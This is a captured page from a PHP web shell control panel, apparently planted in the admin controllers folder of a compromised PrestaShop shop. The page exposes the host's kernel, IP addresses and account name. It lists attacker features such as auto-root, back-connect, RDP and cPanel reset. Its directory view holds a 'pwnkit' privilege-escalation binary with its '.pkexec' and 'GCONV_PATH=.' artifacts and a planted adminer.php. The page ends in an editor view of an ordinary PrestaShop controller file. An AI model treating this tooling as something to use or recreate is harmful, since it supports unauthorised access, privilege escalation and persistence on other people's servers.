Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.51
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
controllers /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
AdminAccessController.php
7.76
KB
-rw----r--
AdminAttributeGeneratorControl...
11.59
KB
-rw----r--
AdminAttributesGroupsControlle...
39.3
KB
-rw----r--
AdminCarrierWizardController.p...
40.47
KB
-rw----r--
AdminCarriersController.php
32.05
KB
-rw----r--
AdminCartRulesController.php
37.94
KB
-rw----r--
AdminCartsController.php
43.36
KB
-rw----r--
AdminCountriesController.php
21.89
KB
-rw----r--
AdminCustomerThreadsController...
53.46
KB
-rw----r--
AdminDashboardController.php
23.83
KB
-rw----r--
AdminFeaturesController.php
24.16
KB
-rw----r--
AdminGendersController.php
8.5
KB
-rw----r--
AdminGroupsController.php
26.09
KB
-rw----r--
AdminImagesController.php
37.67
KB
-rw----r--
AdminImportController.php
240.43
KB
-rw----r--
AdminLegacyLayoutController.ph...
6.55
KB
-rw----r--
AdminLoginController.php
21.1
KB
-rw----r--
AdminModulesController.php
76.69
KB
-rw----r--
AdminModulesPositionsControlle...
29.72
KB
-rw----r--
AdminNotFoundController.php
1.68
KB
-rw----r--
AdminOutstandingController.php
6.38
KB
-rw----r--
AdminPatternsController.php
25.2
KB
-rw----r--
AdminPdfController.php
8.26
KB
-rw----r--
AdminProductsController.php
160.42
KB
-rw----r--
AdminQuickAccessesController.p...
9.29
KB
-rw----r--
AdminReferrersController.php
21.58
KB
-rw----r--
AdminRequestSqlController.php
21.3
KB
-rw----r--
AdminReturnController.php
14.54
KB
-rw----r--
AdminSearchConfController.php
23.54
KB
-rw----r--
AdminSearchController.php
23.45
KB
-rw----r--
AdminSearchEnginesController.p...
3.57
KB
-rw----r--
AdminShopController.php
36.4
KB
-rw----r--
AdminShopGroupController.php
14.6
KB
-rw----r--
AdminShopUrlController.php
23.96
KB
-rw----r--
AdminSpecificPriceRuleControll...
15.93
KB
-rw----r--
AdminStatesController.php
12.62
KB
-rw----r--
AdminStatsController.php
46.01
KB
-rw----r--
AdminStatsTabController.php
11.41
KB
-rw----r--
AdminStatusesController.php
29.33
KB
-rw----r--
AdminStoresController.php
24.67
KB
-rw----r--
AdminSuppliersController.php
24.06
KB
-rw----r--
AdminTabsController.php
14.62
KB
-rw----r--
AdminTagsController.php
5.53
KB
-rw----r--
AdminTaxRulesGroupController.p...
22.01
KB
-rw----r--
AdminTranslationsController.ph...
148.17
KB
-rw----r--
AdminZonesController.php
5.27
KB
-rw----r--
BoOrder.php
1.29
KB
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
index.php
1.34
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AdminGendersController.php
<?php /** * Copyright since 2007 PrestaShop SA and Contributors * PrestaShop is an International Registered Trademark & Property of PrestaShop SA * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.md. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://devdocs.prestashop.com/ for more information. * * @author PrestaShop SA and Contributors <contact@prestashop.com> * @copyright Since 2007 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) */ /** * @property Gender $object */ class AdminGendersControllerCore extends AdminController { public function __construct() { $this->bootstrap = true; $this->table = 'gender'; $this->className = 'Gender'; $this->lang = true; $this->addRowAction('edit'); $this->addRowAction('delete'); parent::__construct(); if (!Tools::getValue('realedit')) { $this->deleted = false; } $this->bulk_actions = [ 'delete' => [ 'text' => $this->trans('Delete selected', [], 'Admin.Actions'), 'confirm' => $this->trans('Delete selected items?', [], 'Admin.Notifications.Warning'), 'icon' => 'icon-trash', ], ]; $this->default_image_height = 16; $this->default_image_width = 16; $this->fieldImageSettings = [ 'name' => 'image', 'dir' => 'genders', ]; $this->fields_list = [ 'id_gender' => [ 'title' => $this->trans('ID', [], 'Admin.Global'), 'align' => 'center', 'class' => 'fixed-width-xs', ], 'name' => [ 'title' => $this->trans('Social title', [], 'Admin.Shopparameters.Feature'), 'filter_key' => 'b!name', ], 'type' => [ 'title' => $this->trans('Gender', [], 'Admin.Global'), 'orderby' => false, 'type' => 'select', 'list' => [ 0 => $this->trans('Male', [], 'Admin.Shopparameters.Feature'), 1 => $this->trans('Female', [], 'Admin.Shopparameters.Feature'), 2 => $this->trans('Neutral', [], 'Admin.Shopparameters.Feature'), ], 'filter_key' => 'a!type', 'callback' => 'displayGenderType', 'callback_object' => $this, ], 'image' => [ 'title' => $this->trans('Image', [], 'Admin.Global'), 'align' => 'center', 'image' => 'genders', 'orderby' => false, 'search' => false, ], ]; } public function initPageHeaderToolbar() { if (empty($this->display)) { $this->page_header_toolbar_btn['new_gender'] = [ 'href' => self::$currentIndex . '&addgender&token=' . $this->token, 'desc' => $this->trans('Add new social title', [], 'Admin.Shopparameters.Feature'), 'icon' => 'process-icon-new', ]; } parent::initPageHeaderToolbar(); } public function renderForm() { $this->fields_form = [ 'legend' => [ 'title' => $this->trans('Social titles', [], 'Admin.Shopparameters.Feature'), 'icon' => 'icon-male', ], 'input' => [ [ 'type' => 'text', 'label' => $this->trans('Social title', [], 'Admin.Global'), 'name' => 'name', 'lang' => true, 'col' => 4, 'hint' => $this->trans('Invalid characters:', [], 'Admin.Shopparameters.Help') . ' 0-9!<>,;?=+()@#"�{}_$%:', 'required' => true, ], [ 'type' => 'radio', 'label' => $this->trans('Gender', [], 'Admin.Global'), 'name' => 'type', 'required' => false, 'class' => 't', 'values' => [ [ 'id' => 'type_male', 'value' => 0, 'label' => $this->trans('Male', [], 'Admin.Shopparameters.Feature'), ], [ 'id' => 'type_female', 'value' => 1, 'label' => $this->trans('Female', [], 'Admin.Shopparameters.Feature'), ], [ 'id' => 'type_neutral', 'value' => 2, 'label' => $this->trans('Neutral', [], 'Admin.Shopparameters.Feature'), ], ], ], [ 'type' => 'file', 'label' => $this->trans('Image', [], 'Admin.Global'), 'name' => 'image', 'col' => 6, 'value' => true, ], [ 'type' => 'text', 'label' => $this->trans('Image width', [], 'Admin.Shopparameters.Feature'), 'name' => 'img_width', 'col' => 2, 'hint' => $this->trans('Image width in pixels. Enter "0" to use the original size.', [], 'Admin.Shopparameters.Help'), ], [ 'type' => 'text', 'label' => $this->trans('Image height', [], 'Admin.Shopparameters.Feature'), 'name' => 'img_height', 'col' => 2, 'hint' => $this->trans('Image height in pixels. Enter "0" to use the original size.', [], 'Admin.Shopparameters.Help'), ], ], 'submit' => [ 'title' => $this->trans('Save', [], 'Admin.Actions'), ], ]; /** @var Gender $obj */ if (!($obj = $this->loadObject(true))) { return; } $this->fields_value = [ 'img_width' => $this->default_image_width, 'img_height' => $this->default_image_height, 'image' => $obj->getImage(), ]; return parent::renderForm(); } public function displayGenderType($value, $tr) { return $this->fields_list['type']['list'][$value]; } protected function postImage($id) { if (isset($this->fieldImageSettings['name'], $this->fieldImageSettings['dir'])) { if (!Validate::isInt(Tools::getValue('img_width')) || !Validate::isInt(Tools::getValue('img_height'))) { $this->errors[] = $this->trans('Width and height must be numeric values.', [], 'Admin.Shopparameters.Notification'); } else { if ((int) Tools::getValue('img_width') > 0 && (int) Tools::getValue('img_height') > 0) { $width = (int) Tools::getValue('img_width'); $height = (int) Tools::getValue('img_height'); } else { $width = null; $height = null; } return $this->uploadImage($id, $this->fieldImageSettings['name'], $this->fieldImageSettings['dir'] . '/', false, $width, $height); } } return !count($this->errors) ? true : false; } protected function afterImageUpload() { parent::afterImageUpload(); if (($id_gender = (int) Tools::getValue('id_gender')) && isset($_FILES) && count($_FILES) && file_exists(_PS_GENDERS_DIR_ . $id_gender . '.jpg')) { $current_file = _PS_TMP_IMG_DIR_ . 'gender_mini_' . $id_gender . '_' . $this->context->shop->id . '.jpg'; if (file_exists($current_file)) { unlink($current_file); } } return true; } }
Close